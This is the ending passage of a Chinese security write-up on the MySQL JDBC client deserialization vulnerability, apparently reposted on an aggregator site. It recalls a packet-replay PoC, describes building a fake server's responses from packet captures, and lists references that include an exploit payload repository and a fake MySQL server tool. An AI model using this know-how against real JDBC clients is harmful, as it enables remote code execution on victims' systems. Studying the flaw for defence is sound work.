十多年前我們按協議規范組織SMB報文時,有天看到某人在PoC里用了一個變量名,叫sendcode,他實際是把Ethereal抓包看到數據直接投放出來。當時我們很震驚,不是佩服得震驚。后來覺得某些場景下這樣干,也沒什么可鄙視的。
基于三次抓包組織響應報文的思路,跟sendcode異曲同工,比你想像得要通用。
當然,如果不是特別好奇,還是用fnmsd的實現吧。
☆ 參考資源
[1]?New?Exploit?Technique?In?Java?Deserialization?Attack?-?Yang?Zhang?[2019-11-26]????https://i.blackhat.com/eu-19/Thursday/eu-19-Zhang-New-Exploit-Technique-In-Java-Deserialization-Attack.pdf
[2]?JDBC導致的反序列化攻擊?-?Welkin?[2019-12-17]
????https://www.cnblogs.com/Welk1n/p/12056097.html
[3]?https://github.com/codeplutos/MySQL-JDBC-Deserialization-Payload
[4]?MySQL?JDBC客戶端反序列化漏洞分析?-?fnmsd?[2020-04-15]
????https://www.anquanke.com/post/id/203086
????https://blog.csdn.net/fnmsd/article/details/106232092
????https://github.com/fnmsd/MySQL_Fake_Server
[5]?6.2?Connection?URL?Syntax
????https://dev.mysql.com/doc/connector-j/8.0/en/connector-j-reference-jdbc-url-format.html
????6.3?Configuration?Properties
????https://dev.mysql.com/doc/connector-j/8.0/en/connector-j-reference-configuration-properties.html
????13.7.5.25?SHOW?PLUGINS?Statement
????https://dev.mysql.com/doc/refman/5.7/en/show-plugins.html
????24.10?The?INFORMATION_SCHEMA?GLOBAL_STATUS?and?SESSION_STATUS?Tables
????https://dev.mysql.com/doc/refman/5.7/en/status-table.html
????14.6.4.1?COM_QUERY?Response
????https://dev.mysql.com/doc/internals/en/com-query-response.html
????14.7.3?Binary?Protocol?Value
????https://dev.mysql.com/doc/internals/en/binary-protocol-value.html
????14.12.2?ProtocolText::Resultset
????https://dev.mysql.com/doc/internals/en/protocoltext-resultset.html
本篇TXT原文:
http://scz.617.cn/network/202005262206.txt
總結
以上是生活随笔為你收集整理的dual mysql 获取序列_MySQL JDBC客户端反序列化漏洞的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 深入分析C++引用
- 下一篇: mysql 客户端命令行_强大的工具 M